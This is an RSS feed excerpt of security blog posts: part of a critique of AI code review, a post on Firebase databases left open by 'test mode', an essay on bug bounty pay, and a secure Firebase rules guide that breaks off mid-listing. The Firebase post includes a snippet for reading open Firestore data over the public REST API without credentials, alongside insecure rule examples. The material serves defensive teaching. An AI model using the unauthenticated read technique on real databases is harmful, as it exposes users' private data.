<p>Every single one was a false positive. When developers see 15 false positives per PR, they stop reading the AI's feedback. The one real SQL injection vulnerability gets merged because nobody takes the bot seriously anymore.</p>
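<p>For example, a parameterised query is the textbook-safe pattern, and still gets flagged because the tool matches on raw SQL strings. A small demonstration that the parameter never becomes SQL (table and data made up):</p>
<pre><code class="lang-python"># Parameterised query: user input is bound as a value, never
# concatenated into the SQL text, so it cannot change the query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, email TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?)", (1, "a@example.com"))

attacker_input = "' OR 1=1 --"   # arrives as a literal string
rows = conn.execute(
    "SELECT id FROM users WHERE email = ?", (attacker_input,)
).fetchall()
print(rows)   # the injection attempt matches no row
</code></pre>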
<h1 id="heading-speed">Speed</h1>
<p>AI code review tools are marketed on speed. "Get feedback in seconds, not hours!" This optimises for the wrong metric.</p>
<p>Code review isn't slow because humans type slowly. It's slow because understanding context takes time. Reading the related code, understanding the business logic, thinking through edge cases - none of this can be rushed.</p>
<p>AI tools optimise for fast feedback. Developers optimise for getting code merged. The combination produces code that passes automated checks but doesn't actually work correctly.</p>
<h1 id="heading-economics">Economics</h1>
<p>Companies buy AI code review tools for two reasons:</p>
<ol>
<li><p><strong>To reduce headcount</strong> - fewer senior engineers needed if AI does code review</p>
</li>
<li><p><strong>To ship faster</strong> - remove the bottleneck of waiting for human reviewers</p>
</li>
</ol>
<p>Both reasons directly conflict with code quality. You're replacing experienced judgment with pattern matching, and adding pressure to merge quickly.</p>
<p>The incentives are clear: vendors sell speed and cost reduction, companies buy those metrics, and code quality suffers. Nobody's incentive is aligned with "catch more bugs."</p>
<h1 id="heading-what-works">What Works</h1>
<p>The solution isn't better AI code review. It's better human code review.</p>
<ul>
<li><p><strong>Pair programming</strong> - real-time review catches issues before they're even committed</p>
</li>
<li><p><strong>Small PRs</strong> - easier to review thoroughly, less likely to hide bugs</p>
</li>
<li><p><strong>Domain expertise</strong> - reviewers who understand the system, not just the syntax</p>
</li>
<li><p><strong>Accountability</strong> - reviewers whose names are attached to what they approve</p>
</li>
<li><p><strong>Time</strong> - allowing reviewers to actually think through the changes</p>
</li>
</ul>
<p>None of these scale as well as AI code review. That's the point. Code review shouldn't scale. If you're merging so much code that human review is a bottleneck, you have a process problem, not a tooling problem.</p>
<h1 id="heading-the-truth">The Truth</h1>
<p>AI code review tools exist because companies want to ship faster with fewer experienced engineers. The tools work well enough to justify the purchase, but not well enough to actually improve code quality.</p>
<p>What you get is:</p>
<ul>
<li><p>Junior developers who think the AI caught all the issues</p>
</li>
<li><p>Senior developers who ignore the AI because of alert fatigue</p>
</li>
<li><p>Management who sees "100% of PRs reviewed by AI" as a quality metric</p>
</li>
<li><p>Production incidents that would have been caught by a human reviewer</p>
</li>
</ul>
<p>The feedback loop ensures this gets worse over time. AI-approved code trains the next version of the AI. Bad code becomes the baseline.</p>
<h1 id="heading-what-i-do">What I Do</h1>
<p>I don't use AI code review tools on projects I care about. I use:</p>
<ul>
<li><p><strong>Linters</strong> - for style and simple pattern matching (what AI code review actually does well)</p>
</li>
<li><p><strong>Static analysis</strong> - language-specific tools that understand semantics, not just syntax</p>
</li>
<li><p><strong>Human reviewers</strong> - people who understand the system and business logic</p>
</li>
<li><p><strong>Tests</strong> - including the weird edge cases AI tools never think to check</p>
</li>
</ul>
<p>Is it slower? Yes. Does it catch more bugs? Absolutely.</p>
<p>The industry has spent the last decade optimising for development speed. We've gotten very fast at shipping bugs to production. Maybe it's time to optimise for correctness instead.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>AI code review isn't useless. It's worse than useless - it creates the illusion of thorough review while making it easier to ship bad code.</p>
<p>The problem isn't the technology. It's that the technology is being used to replace judgment with pattern matching, and accountability with automation.</p>
<p>Companies don't want to admit they're using AI code review to cut costs and ship faster. They frame it as "augmenting" human reviewers. In practice, it's replacing them. And the code quality shows it.</p>
<p>The fix requires admitting that code review is valuable because it's slow and thoughtful, not despite it. AI tools optimised for speed and cost will never provide the same value as a senior engineer who actually understands the system.</p>
<p>But that requires paying senior engineers and accepting slower ship times. So instead, we'll keep using AI code review, keep shipping bugs, and keep wondering why code quality is declining.</p>
<p>The tools aren't making code better. They're just making it easier to pretend we reviewed it.</p>
]]></content:encoded></item><item><title><![CDATA[Test Mode to Production with Firebase]]></title><description><![CDATA[Firebase has a "test mode" that allows anyone to read and write your entire database. Developers enable it during development and forget to change it before deploying to production.
This isn't a rare mistake. It's constant. Millions of Firebase datab...]]></description><link>https://blog.jacobalcock.co.uk/test-mode-to-production-with-firebase</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/test-mode-to-production-with-firebase</guid><category><![CDATA[Firebase]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Thu, 13 Nov 2025 07:53:34 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762708258059/b187c513-7594-4a4a-b243-da0e1d267803.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Firebase has a "test mode" that allows anyone to read and write your entire database. Developers enable it during development and forget to change it before deploying to production.</p>
<p>This isn't a rare mistake. It's constant. Millions of Firebase databases are running wide open right now because someone clicked "test mode" and never looked back.</p>
<h1 id="heading-the-default">The Default</h1>
<p>When you create a Cloud Firestore or Realtime Database instance in the Firebase console, you get two options:</p>
<ul>
<li><p><strong>Locked mode</strong>: Deny all access</p>
</li>
<li><p><strong>Test mode</strong>: Allow all access for a month</p>
</li>
</ul>
<p>Test mode gives you these rules:</p>
<p><strong>Cloud Firestore</strong>:</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /{document=**} {
      allow read, write: if request.time &lt; timestamp.date(2025, 12, 1);
    }
  }
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    ".read": "now &lt; 1701388800000",
    ".write": "now &lt; 1701388800000"
  }
}
</code></pre>
<p>Notice the time condition. Test mode is supposed to lock down after 30 days. In theory, developers should update their rules before the deadline.</p>
<p>In practice, that doesn't happen.</p>
<h1 id="heading-what-actually-happens">What Actually Happens</h1>
<p>Developers enable test mode to get started quickly. They build their app, test functionality, add features. The 30-day deadline approaches.</p>
<p>Firebase sends a warning email: "Your security rules will expire soon."</p>
<p>Faced with that deadline, developers do one of three things:</p>
<ol>
<li><p><strong>Ignore it</strong> - the email goes to spam or gets lost</p>
</li>
<li><p><strong>Extend the deadline</strong> - click the "extend for 30 days" button in the console</p>
</li>
<li><p><strong>Ship insecure rules</strong> - remove the time restriction and just leave <code>if true</code></p>
</li>
</ol>
<p>Option 3 is the disaster. Once you remove the time restriction, your database is permanently wide open. No more warnings. No forced deadline. Just a production database that anyone can read and write.</p>
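<p>"Anyone can read and write" is literal: an open Firestore instance is reachable through its public REST API with no credentials at all. A minimal sketch of what a scanner runs ("example-project" and "users" are placeholder names):</p>
<pre><code class="lang-plaintext">// Reading an open Firestore database over its public REST API.
// No credentials are needed when the rules allow unauthenticated reads.
// "example-project" and "users" are placeholder names.
const projectId = 'example-project';
const collection = 'users';
const url =
  'https://firestore.googleapis.com/v1/projects/' + projectId +
  '/databases/(default)/documents/' + collection;
console.log(url);

// In a real run: fetch(url).then(function (r) { return r.json(); }).then(console.log);
</code></pre>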
<h1 id="heading-the-tea-app">The Tea App</h1>
<p>The Tea app had 50+ million users. Their Firestore database was completely open. No authentication required. Anyone could:</p>
<ul>
<li><p>Read all user data (emails, phone numbers, locations)</p>
</li>
<li><p>Modify user records</p>
</li>
<li><p>Delete accounts</p>
</li>
<li><p>Access private messages</p>
</li>
<li><p>Extract the entire database</p>
</li>
</ul>
<p>The breach was discovered by security researchers doing routine scans. They found the database, extracted everything, and disclosed it responsibly. Tea fixed it. But the damage was done.</p>
<h1 id="heading-why-this-keeps-happening">Why This Keeps Happening</h1>
<p><strong>Firebase makes it easy to be insecure</strong></p>
<p>Test mode is the default suggestion. "Get started quickly!" Locked mode requires you to write rules immediately. Developers often choose the path of least resistance.</p>
<p><strong>Security rules are separate from application logic</strong></p>
<p>Your app code is version controlled, code reviewed, tested. Your Firebase rules are edited in a web console or deployed separately. They don't get the same scrutiny.</p>
<p><strong>No forced security checks</strong></p>
<p>Firebase doesn't prevent you from deploying insecure rules. You can literally ship <code>allow read, write: if true;</code> to production. No warnings, no confirmation dialogs, no "are you sure?"</p>
<p><strong>Developers don't understand the risk</strong></p>
<p>Many developers treat Firebase like a backend-as-a-service that handles security for them. They don't realise the rules they write ARE the security. If the rules say "allow access to everyone," that's exactly what happens.</p>
<p><strong>Deadlines and shipping pressure</strong></p>
<p>Implementing proper security rules takes time. Learning the rules language, understanding data access patterns, testing edge cases. When the deadline is tomorrow, <code>if true</code> ships.</p>
<h1 id="heading-economics">Economics</h1>
<p>Firebase's business model is based on usage. More apps using Firebase = more revenue. Making security easy would require:</p>
<ul>
<li><p>Better defaults</p>
</li>
<li><p>Forced security reviews before production</p>
</li>
<li><p>Automated vulnerability scanning</p>
</li>
<li><p>Warnings for obviously insecure patterns</p>
</li>
</ul>
<p>All of this adds friction. Friction reduces adoption. Firebase optimises for growth, not security.</p>
<p>Google could force developers to implement secure rules before going to production. They don't. Because the developer who can't figure out security rules will choose a different platform.</p>
<h1 id="heading-impact">Impact</h1>
<p>I've found hundreds of open Firebase databases during penetration tests and security research. The pattern is consistent:</p>
<p><strong>Open Firestore/RTDB instances containing</strong>:</p>
<ul>
<li><p>User credentials (emails, phone numbers, addresses)</p>
</li>
<li><p>Payment information (stored credit cards, transaction history)</p>
</li>
<li><p>Private messages and chat logs</p>
</li>
<li><p>Location data and tracking information</p>
</li>
<li><p>API keys and service credentials</p>
</li>
<li><p>Business data (customer lists, sales records, internal documents)</p>
</li>
</ul>
<p><strong>Common rule patterns</strong>:</p>
<pre><code class="lang-plaintext">// "Test mode" shipped to production
allow read, write: if true;

// "Any authenticated user" (not much better)
allow read, write: if request.auth != null;

// "Misconfigured cascading rules"
match /users/{userId} {
  allow read: if true;
  match /private/{document} {
    allow read: if false; // This doesn't work, parent rule grants access
  }
}
</code></pre>
<h1 id="heading-what-you-should-do">What You Should Do</h1>
<p><strong>Never use test mode</strong></p>
<p>Start with locked mode. Write rules from day one. Don't use test mode "just for development": adding proper rules retrospectively is much harder, and worse, you may simply forget to change them.</p>
<p><strong>Version control your rules</strong></p>
<p>Include <code>firestore.rules</code> or <code>database.rules.json</code> in your repository. Review changes like you review code.</p>
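<p>With the Firebase CLI, rules files can live in the repository and deploy alongside your code. A minimal sketch, assuming the standard file names in the project root:</p>
<pre><code class="lang-plaintext">// firebase.json (points the CLI at version-controlled rules files)
{
  "firestore": { "rules": "firestore.rules" },
  "database": { "rules": "database.rules.json" }
}

// Deploy rules through the same pipeline as code:
// firebase deploy --only firestore:rules
// firebase deploy --only database
</code></pre>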
<p><strong>Test your rules</strong></p>
<p>Use the Firebase Emulator to test rules locally. Write unit tests for your security rules. Don't rely on "it works in the console."</p>
<p><strong>Audit production rules regularly</strong></p>
<p>Set up monitoring for rule changes. Review your production rules monthly. Check for patterns like <code>if true</code> or missing auth checks.</p>
<p><strong>Use the principle of least privilege</strong></p>
<p>Default to denying access. Only grant access where specifically needed. Don't use <code>match /{document=**}</code> with broad permissions.</p>
<p><strong>Understand cascading rules</strong></p>
<p>In Realtime Database, parent rules override child rules. You can't restrict access at a child path if you granted it at a parent path.</p>
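<p>A sketch of the pitfall (illustrative paths):</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "users": {
      ".read": true,       // parent grants read access to everything below...
      "$userId": {
        ".read": false     // ...so this restriction is ignored; reads still succeed
      }
    }
  }
}
</code></pre>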
<p><strong>Use a tool to audit</strong></p>
<p>Before launching, and whenever your rules change, audit your infrastructure with something like my tool, <a target="_blank" href="https://firescan.jacobalcock.co.uk/">FireScan</a>.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Firebase test mode is a trap. It's designed to get developers started quickly, but it creates a ticking time bomb if you forget to update your rules.</p>
<p>The 30-day expiration is supposed to prevent this. In practice, developers extend it or remove it entirely. Firebase doesn't prevent this because preventing it would create friction.</p>
<p>The security model is fundamentally broken: Firebase gives developers complete control over security through a complex rules language, then provides a "skip security" button (test mode) for convenience.</p>
<p>Developers click the skip button. They ship to production. They expose millions of user records. Firebase sends warning emails that get ignored.</p>
<p>The cycle continues. And millions of databases remain wide open because nobody forced the developer to understand security rules before deploying.</p>
<p>If you're using Firebase: audit your rules. Today. Don't trust that you "probably fixed it." Check your rules in the Firebase console right now.</p>
<p>The next person who discovers your open database might not disclose it responsibly.</p>
]]></content:encoded></item><item><title><![CDATA[Bug Bounty Platforms Are Exploiting Researchers]]></title><description><![CDATA[Bug bounty platforms claim to connect security researchers with companies. In reality, they're intermediaries extracting value from both sides while researchers do skilled labor for poor wages.
The economics are broken. Companies get critical vulnera...]]></description><link>https://blog.jacobalcock.co.uk/bug-bounty-platforms-are-exploiting-researchers</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/bug-bounty-platforms-are-exploiting-researchers</guid><category><![CDATA[bugbounty]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Tue, 11 Nov 2025 21:33:34 GMT</pubDate><content:encoded><![CDATA[<p>Bug bounty platforms claim to connect security researchers with companies. In reality, they're intermediaries extracting value from both sides while researchers do skilled labor for poor wages.</p>
<p>The economics are broken. Companies get critical vulnerabilities fixed for less than a junior developer's daily rate. Platforms take 20% cuts for running a web form. Researchers get paid $500 for finding bugs that would cost $50,000 or more on the gray market.</p>
<p>Nobody in this equation benefits except the platforms. A critical remote code execution vulnerability in a SaaS product should be worth significantly more than what bug bounty programs pay. Here's the actual market rate comparison:</p>
<ul>
<li><p><strong>Bug Bounty Program</strong>: $500 - $5,000</p>
</li>
<li><p><strong>Responsible Disclosure (no bounty)</strong>: $0</p>
</li>
<li><p><strong>Gray Market (Zerodium, etc.)</strong>: $50,000 - $500,000</p>
</li>
<li><p><strong>Nation-State Buyers</strong>: $500,000 - $2,500,000</p>
</li>
</ul>
<p>The gap between bug bounty payouts and actual market value is 100x to 500x. Researchers are expected to do the right thing while leaving 99% of the value on the table.</p>
<h1 id="heading-economics">Economics</h1>
<p>Most bug bounty platforms take a 20% cut. Some charge companies setup fees, monthly fees, or take even larger percentages. Here's what that looks like:</p>
<ul>
<li><p><strong>Researcher finds critical RCE</strong>: 40 hours of work</p>
</li>
<li><p><strong>Company bounty</strong>: $2,500</p>
</li>
<li><p><strong>Platform cut (20%)</strong>: $500</p>
</li>
<li><p><strong>Researcher payout</strong>: $2,000</p>
</li>
<li><p><strong>Effective hourly rate</strong>: $50/hour</p>
</li>
</ul>
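<p>The arithmetic above as a quick sanity check:</p>
<pre><code class="lang-plaintext">// Effective hourly rate after the platform cut (figures from the example above)
const bounty = 2500;    // company bounty in dollars
const cutPercent = 20;  // platform's cut
const hours = 40;       // time spent finding the bug

const payout = (bounty * (100 - cutPercent)) / 100; // researcher payout
const hourly = payout / hours;                      // effective hourly rate
console.log(payout, hourly); // 2000 50
</code></pre>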
<p>That $50/hour is before:</p>
<ul>
<li><p>Taxes (20-40% depending on jurisdiction and other factors)</p>
</li>
<li><p>Time spent on duplicates and rejected reports</p>
</li>
<li><p>Infrastructure costs (VPS, tools, domains for testing)</p>
</li>
<li><p>Unpaid time learning and researching new vulnerabilities</p>
</li>
</ul>
<p>Real effective rate after accounting for all work: $15-20/hour for skilled security work.</p>
<p>Meanwhile, penetration testers bill $200-400/hour. The same researcher doing the same work gets paid 10-20x less through bug bounties.</p>
<h1 id="heading-duplicates">Duplicates</h1>
<p>Most serious vulnerabilities are found within hours of program launch by multiple researchers simultaneously. Only the first report gets paid.</p>
<p>You spend 20 hours finding a critical SQL injection. You write a detailed report with proof-of-concept, impact analysis, and remediation steps. You submit it.</p>
<p>"Duplicate. This was already reported 30 minutes ago."</p>
<p>You get $0. The platform still takes their 20% from the other researcher's payout. You subsidised their business model with free labor.</p>
<h1 id="heading-triage">Triage</h1>
<p>Bug bounty platforms employ "triage teams" to review submissions. In theory, this helps companies by filtering out noise. In practice, it adds another layer that doesn't understand the reported vulnerability.</p>
<p>I've seen critical vulnerabilities marked as "informational" by triage teams because they didn't understand the exploit chain. I've seen SQLi marked as a duplicate of XSS because both were "injection vulnerabilities." I've seen valid reports closed as "won't fix" and then silently patched two weeks later with no payout.</p>
<p>The triage team has zero incentive to advocate for researchers. They're paid by the platform, which is paid by companies. Their incentive is to minimise payouts and close reports quickly.</p>
<h1 id="heading-scope-creep-and-retroactive-rules">Scope Creep and Retroactive Rules</h1>
<p>You spend weeks testing a target. You find a critical vulnerability in a domain that's in scope. You report it.</p>
<p>"Out of scope. We updated the scope yesterday to exclude that subdomain."</p>
<p>Or:</p>
<p>"This type of vulnerability is excluded per our policy update from last week."</p>
<p>Or my personal favorite:</p>
<p>"This is a duplicate of a vulnerability we fixed last year and never disclosed."</p>
<p>Bug bounty programs can change rules retroactively. Researchers have no recourse. The platform sides with the paying customer (the company) every time.</p>
<h1 id="heading-a-race-to-the-bottom">A Race to the Bottom</h1>
<p>Because bug bounties pay so little, they attract researchers who:</p>
<ol>
<li><p>Are in countries with low cost of living</p>
</li>
<li><p>Are students/hobbyists who don't value their time</p>
</li>
<li><p>Use automated scanners and submit everything (creating noise)</p>
</li>
<li><p>Don't know their work is worth 100x more</p>
</li>
</ol>
<p>This creates a race to the bottom. Why would a company pay $10,000 when someone in a developing country will report it for $500? Why would platforms advocate for higher payouts when volume is more profitable than quality?</p>
<p>The result: experienced researchers leave the bug bounty ecosystem. Quality of reports declines. Companies get flooded with low-quality automated scanner output. Everyone loses except the platforms, who get paid per report processed.</p>
<h1 id="heading-publicity">Publicity</h1>
<p>Many bug bounty programs exist purely for PR. "We have a bug bounty program" signals that the company takes security seriously. The actual payouts tell a different story:</p>
<ul>
<li><p>Maximum bounty: $10,000 (looks good in marketing)</p>
</li>
<li><p>Average bounty paid: $150</p>
</li>
<li><p>Median bounty paid: $50</p>
</li>
<li><p>Number of critical vulnerabilities found: 47</p>
</li>
<li><p>Highest payout for critical vulnerability: $500</p>
</li>
</ul>
<p>The "$10,000 maximum bounty" is marketing. The reality is $50 for finding exploitable bugs in production systems.</p>
<h1 id="heading-exposure">"Exposure"</h1>
<p>Platforms and companies defend low bounties with:</p>
<p>"You get exposure!" "You're building your reputation!" "It's responsible disclosure!" "Think of it as practice!"</p>
<p>This is the same argument used to exploit artists, musicians, and writers. "Work for free/cheap for the exposure."</p>
<p>Security researchers don't need exposure. They need money. Skills that find RCE in production systems are worth real money. Asking researchers to work for "reputation points" while companies save millions on security audits is exploitation.</p>
<h1 id="heading-what-companies-are-actually-saving">What Companies Are Actually Saving</h1>
<p>A professional penetration test costs $5,000 - $50,000+ depending on scope. Companies using bug bounties as their primary security testing model are getting:</p>
<ul>
<li><p>Continuous testing (not point-in-time)</p>
</li>
<li><p>Diverse researcher skill sets</p>
</li>
<li><p>Global coverage (researchers in all time zones)</p>
</li>
<li><p>No upfront costs</p>
</li>
<li><p>Pay-per-vulnerability instead of flat fee</p>
</li>
</ul>
<p>A bug bounty program that pays out $100,000/year is replacing $500,000+ worth of professional security testing. The platform takes $20,000 of that. Researchers split $80,000 while doing half a million dollars' worth of work.</p>
<p><strong>The value extraction is staggering.</strong></p>
<h1 id="heading-revenue-models">Revenue Models</h1>
<p>Bug bounty platforms are profitable businesses. HackerOne, Bugcrowd, Synack - all have raised hundreds of millions in VC funding. Their unit economics work because:</p>
<ul>
<li><p>Take 20% of all payouts (pure margin)</p>
</li>
<li><p>Charge companies platform fees</p>
</li>
<li><p>Sell "managed programs" at premium prices</p>
</li>
<li><p>Pay researchers as little as possible</p>
</li>
<li><p>No inventory, no overhead, no liability</p>
</li>
</ul>
<p>It's a classic marketplace play: connect two sides, extract maximum value, provide minimum infrastructure.</p>
<p>The researcher does the skilled work. The company gets the value. The platform takes the cut. Who's being exploited here?</p>
<h1 id="heading-what-actually-needs-to-change">What Actually Needs to Change</h1>
<ul>
<li><p><strong>Minimum bounty standards</strong>: Critical vulnerabilities should have floor prices ($10,000+)</p>
</li>
<li><p><strong>No platform cuts on bounties</strong>: Platforms should charge companies directly, not take cuts from researcher payouts</p>
</li>
<li><p><strong>Duplicate protection</strong>: If multiple researchers find the same bug within a reasonable window, split the bounty</p>
</li>
<li><p><strong>Binding scope</strong>: Companies can't change scope retroactively to avoid payouts</p>
</li>
<li><p><strong>Independent arbitration</strong>: Disputes resolved by third parties, not platform-employed triage teams</p>
</li>
<li><p><strong>Disclosure rights</strong>: Researchers can disclose after 90 days regardless of fix status</p>
</li>
</ul>
<p>None of this will happen voluntarily. Platforms are profitable under the current model. Companies get cheap security testing. Researchers lack negotiating power.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Bug bounty platforms have successfully convinced the security industry that paying researchers 1% of market value is "ethical" and "responsible."</p>
<p>It's not. It's exploitation with good PR.</p>
<p>The platforms extract value by positioning themselves between researchers and companies, taking cuts while providing minimal infrastructure. Companies get professional security testing at a fraction of market rates. Researchers get poverty wages for skilled work.</p>
<p>The bug bounty model could work if payouts reflected actual value. A critical RCE should pay $50,000, not $500. Platforms should charge companies service fees, not extract from researcher payouts. Duplicates should be handled fairly.</p>
<p>But that would require platforms to care about researchers as much as they care about companies. And companies are the ones paying the bills.</p>
<p>So instead, we have a system that works great for platforms and companies, and barely works for researchers. And we call it "ethical hacking."</p>
<p>The economics are broken. The incentives are broken. The only question is how long researchers will keep accepting it.</p>
]]></content:encoded></item><item><title><![CDATA[How to Write Secure Firebase Rules]]></title><description><![CDATA[Firebase Security Rules are the only thing protecting your data from unauthorised access. This guide covers how to write rules that actually secure your app.
Understanding the Basics
Firebase Security Rules work by matching paths and applying conditi...]]></description><link>https://blog.jacobalcock.co.uk/how-to-write-secure-firebase-rules</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/how-to-write-secure-firebase-rules</guid><category><![CDATA[Firebase]]></category><category><![CDATA[Security]]></category><category><![CDATA[firestore]]></category><category><![CDATA[development]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Sun, 09 Nov 2025 17:43:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762710212505/148ab434-ec91-4b3c-b6b1-268ec0d0ada4.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Firebase Security Rules are the only thing protecting your data from unauthorised access. This guide covers how to write rules that actually secure your app.</p>
<h1 id="heading-understanding-the-basics">Understanding the Basics</h1>
<p>Firebase Security Rules work by matching paths and applying conditions. If the condition evaluates to <code>true</code>, the request is allowed. If <code>false</code>, it's denied.</p>
<h2 id="heading-cloud-firestore-rules-structure">Cloud Firestore Rules Structure</h2>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Your rules go here
    match /collection/{document} {
      allow read, write: if &lt;condition&gt;;
    }
  }
}
</code></pre>
<h2 id="heading-realtime-database-rules-structure">Realtime Database Rules Structure</h2>
<pre><code class="lang-plaintext">{
  "rules": {
    "path": {
      ".read": "&lt;condition&gt;",
      ".write": "&lt;condition&gt;"
    }
  }
}
</code></pre>
<h2 id="heading-key-concepts">Key Concepts</h2>
<ul>
<li><p><strong>Match blocks</strong>: Define which paths the rule applies to</p>
</li>
<li><p><strong>Allow statements</strong>: Specify what operations are permitted</p>
</li>
<li><p><strong>Conditions</strong>: Boolean expressions that grant or deny access</p>
</li>
<li><p><strong>Variables</strong>: <code>request</code> (incoming request data) and <code>resource</code> (existing data)</p>
</li>
</ul>
<h1 id="heading-rule-methods">Rule Methods</h1>
<p>Firestore rules support granular methods:</p>
<ul>
<li><p><code>read</code>: Covers both <code>get</code> (single document) and <code>list</code> (queries)</p>
</li>
<li><p><code>write</code>: Covers <code>create</code>, <code>update</code>, and <code>delete</code></p>
</li>
<li><p><code>get</code>: Read a single document</p>
</li>
<li><p><code>list</code>: Read queries and collections</p>
</li>
<li><p><code>create</code>: Write new documents</p>
</li>
<li><p><code>update</code>: Modify existing documents</p>
</li>
<li><p><code>delete</code>: Remove documents</p>
</li>
</ul>
<pre><code class="lang-plaintext">// Granular control
match /posts/{postId} {
  allow get: if true;  // Anyone can read a single post
  allow list: if request.auth != null;  // Only authenticated users can query
  allow create: if request.auth != null;  // Only authenticated users can create
  allow update: if request.auth.uid == resource.data.authorId;  // Only author can update
  allow delete: if request.auth.uid == resource.data.authorId;  // Only author can delete
}
</code></pre>
<h1 id="heading-common-secure-patterns">Common Secure Patterns</h1>
<h2 id="heading-pattern-1-user-can-only-access-their-own-data">Pattern 1: User Can Only Access Their Own Data</h2>
<p><strong>Use case</strong>: User profiles, private documents, personal settings</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /users/{userId} {
  allow read, write: if request.auth != null &amp;&amp; request.auth.uid == userId;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "users": {
      "$userId": {
        ".read": "$userId === auth.uid",
        ".write": "$userId === auth.uid"
      }
    }
  }
}
</code></pre>
<h2 id="heading-pattern-2-public-read-authenticated-write">Pattern 2: Public Read, Authenticated Write</h2>
<p><strong>Use case</strong>: Blog posts, public content, product listings</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /posts/{postId} {
  allow read: if true;
  allow create: if request.auth != null;
  allow update, delete: if request.auth != null
                         &amp;&amp; request.auth.uid == resource.data.authorId;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "posts": {
      "$postId": {
        ".read": true,
        ".write": "auth != null &amp;&amp; (!data.exists() || data.child('authorId').val() === auth.uid)"
      }
    }
  }
}
</code></pre>
<h2 id="heading-pattern-3-role-based-access-using-custom-claims">Pattern 3: Role-Based Access Using Custom Claims</h2>
<p><strong>Use case</strong>: Admin panels, multi-role applications</p>
<p><strong>Setup custom claims</strong> (server-side):</p>
<pre><code class="lang-plaintext">const admin = require('firebase-admin');

// Set custom claims
await admin.auth().setCustomUserClaims(uid, { admin: true });
</code></pre>
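<p>One gotcha worth noting: custom claims are baked into the ID token, so they only take effect after the client's token refreshes (which can take up to an hour by default). A sketch of forcing the refresh on the client (Web SDK v9+):</p>
<pre><code class="lang-plaintext">import { getAuth } from 'firebase/auth';

// After the server sets new claims, force a token refresh so they
// appear in request.auth.token on the next request
async function refreshClaims() {
  const user = getAuth().currentUser;
  if (user) {
    await user.getIdToken(true); // true = bypass the cached token
  }
}
</code></pre>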
<p><strong>Firestore rules</strong>:</p>
<pre><code class="lang-plaintext">match /adminData/{document} {
  allow read, write: if request.auth.token.admin == true;
}

match /posts/{postId} {
  allow read: if true;
  allow write: if request.auth.token.editor == true
               || request.auth.token.admin == true;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "adminData": {
      ".read": "auth.token.admin === true",
      ".write": "auth.token.admin === true"
    }
  }
}
</code></pre>
<h2 id="heading-pattern-4-data-validation">Pattern 4: Data Validation</h2>
<p><strong>Use case</strong>: Ensuring data format and required fields</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /posts/{postId} {
  allow create: if request.auth != null
                &amp;&amp; request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
                &amp;&amp; request.resource.data.title is string
                &amp;&amp; request.resource.data.title.size() &gt; 0
                &amp;&amp; request.resource.data.title.size() &lt; 200
                &amp;&amp; request.resource.data.authorId == request.auth.uid;

  allow update: if request.auth != null
                &amp;&amp; request.auth.uid == resource.data.authorId
                &amp;&amp; request.resource.data.authorId == resource.data.authorId; // Prevent changing author
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "posts": {
      "$postId": {
        ".write": "auth != null &amp;&amp; newData.hasChildren(['title', 'content', 'authorId'])",
        "title": {
          ".validate": "newData.isString() &amp;&amp; newData.val().length &gt; 0 &amp;&amp; newData.val().length &lt; 200"
        },
        "authorId": {
          ".validate": "newData.val() === auth.uid &amp;&amp; (!data.exists() || data.val() === newData.val())"
        }
      }
    }
  }
}
</code></pre>
<h2 id="heading-pattern-5-attribute-based-access-data-driven-roles">Pattern 5: Attribute-Based Access (Data-Driven Roles)</h2>
<p><strong>Use case</strong>: Shared documents, team access, permission-based systems</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /projects/{projectId} {
  allow read: if request.auth != null
              &amp;&amp; request.auth.uid in resource.data.members;

  allow write: if request.auth != null
               &amp;&amp; request.auth.uid in resource.data.admins;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "projects": {
      "$projectId": {
        ".read": "auth != null &amp;&amp; data.child('members').child(auth.uid).exists()",
        ".write": "auth != null &amp;&amp; data.child('admins').child(auth.uid).exists()"
      }
    }
  }
}
</code></pre>
<h1 id="heading-using-functions-for-reusable-logic">Using Functions for Reusable Logic</h1>
<p>Functions make rules more maintainable and readable.</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {

    // Check if user is authenticated
    function isSignedIn() {
      return request.auth != null;
    }

    // Check if user owns the resource
    function isOwner(userId) {
      return request.auth.uid == userId;
    }

    // Check if user has a specific role
    function hasRole(role) {
      return isSignedIn() &amp;&amp; request.auth.token[role] == true;
    }

    // Validate required fields
    function hasRequiredFields(fields) {
      return request.resource.data.keys().hasAll(fields);
    }

    // Use the functions
